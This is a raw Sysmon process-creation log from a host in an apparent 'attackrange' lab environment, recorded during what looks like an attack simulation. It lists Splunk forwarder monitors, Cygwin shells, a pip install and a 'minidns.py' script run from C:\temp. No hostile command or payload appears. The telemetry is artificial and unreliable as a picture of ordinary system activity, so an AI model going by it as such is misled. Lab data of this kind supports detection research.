15:09:19.977{A8622C2F-571F-6078-840D-00000000AE01}5332C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064169Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.957{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-820D-00000000AE01}4412C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000064153Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.941{A8622C2F-571F-6078-820D-00000000AE01}4412C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-571F-6078-7E0D-00000000AE01}5744C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000064139Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.911{A8622C2F-571F-6078-800D-00000000AE01}5320C:\cygwin64\bin\cygwin-console-helper.exe-----"\\?\C:\cygwin64\bin\cygwin-console-helper.exe" 0x418 
0x41CC:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8BFA89E9045A949619C8511955C39779,SHA256=7B4BB51FC16D1B4F44D2A73D9939C177008D5DB4E9EECCA42A9D01D90D7C8CEF,IMPHASH=DC4FCFEBC59A5F04DB2C6D852B01071C{A8622C2F-571F-6078-7E0D-00000000AE01}5744C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000064118Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.884{A8622C2F-571F-6078-7F0D-00000000AE01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064095Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.844{A8622C2F-571F-6078-7E0D-00000000AE01}5744C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000064067Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.281{A8622C2F-571F-6078-7D0D-00000000AE01}6912C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064038Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:17.478{A8622C2F-571D-6078-7C0D-00000000AE01}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063995Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:16.948{A8622C2F-571C-6078-7A0D-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:16.282{A8622C2F-571C-6078-790D-00000000AE01}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063922Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:06.113{A8622C2F-5712-6078-780D-00000000AE01}2132C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063894Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:09:03.095{A8622C2F-570F-6078-770D-00000000AE01}3500C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063825Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:48.510{A8622C2F-5700-6078-760D-00000000AE01}6196C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063788Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:42.132{A8622C2F-56FA-6078-750D-00000000AE01}3376C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063736Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:08:31.611{A8622C2F-56EF-6078-740D-00000000AE01}5136C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063682Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:22.648{A8622C2F-56E6-6078-730D-00000000AE01}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063659Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:20.619{A8622C2F-56E4-6078-720D-00000000AE01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000063648Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:20.216{A8622C2F-56E4-6078-710D-00000000AE01}5708C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"c:\program files\python38\python.exe" "C:\Program Files\Python38\Scripts\pip.exe" install socketC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-56E4-6078-700D-00000000AE01}6852C:\Program Files\Python38\Scripts\pip.exepip install socket 154100x800000000000000063640Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:20.203{A8622C2F-56E4-6078-700D-00000000AE01}6852C:\Program Files\Python38\Scripts\pip.exe-----pip install socketC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8C59BBC73977CF9EF0B1C926AB828274,SHA256=30FDEC6ED3761F1CFB7D32387BE22F827E2349CD81BFD03FF69B315834DA6175,IMPHASH=132E825E554E7B8D464D7812F8FB426A{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000063631Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:19.996{A8622C2F-56E3-6078-6F0D-00000000AE01}6440C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" 
service 154100x800000000000000063621Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:19.313{A8622C2F-56E3-6078-6E0D-00000000AE01}5904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063596Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:17.593{A8622C2F-56E1-6078-6D0D-00000000AE01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063585Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:16.927{A8622C2F-56E0-6078-6C0D-00000000AE01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063575Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:08:16.276{A8622C2F-56E0-6078-6B0D-00000000AE01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063387Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:42.221{A8622C2F-56BE-6078-6A0D-00000000AE01}6944C:\cygwin64\bin\cut.exe-----cut -d ' ' -f1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-56BE-6078-680D-00000000AE01}804C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000063380Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:42.220{A8622C2F-56BE-6078-690D-00000000AE01}648C:\cygwin64\bin\hostname.exe-----hostname -I 
C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-56BE-6078-680D-00000000AE01}804C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000063372Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:42.214{A8622C2F-56BE-6078-680D-00000000AE01}804C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-56BE-6078-670D-00000000AE01}4056C:\Python27\python.exeC:\Python27\python.exe minidns.py 154100x800000000000000063364Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:42.168{A8622C2F-56BE-6078-670D-00000000AE01}4056C:\Python27\python.exe-----C:\Python27\python.exe minidns.pyC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-56BE-6078-660D-00000000AE01}5376C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063345Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:07:42.158{A8622C2F-56BE-6078-660D-00000000AE01}5376C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000063257Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:22.739{A8622C2F-56AA-6078-650D-00000000AE01}3148C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063234Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:20.634{A8622C2F-56A8-6078-640D-00000000AE01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000063225Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:19.965{A8622C2F-56A7-6078-630D-00000000AE01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:19.302{A8622C2F-56A7-6078-620D-00000000AE01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063200Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:17.562{A8622C2F-56A5-6078-610D-00000000AE01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063190Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:16.911{A8622C2F-56A4-6078-600D-00000000AE01}5852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000063178Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:07:16.291{A8622C2F-56A4-6078-5F0D-00000000AE01}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
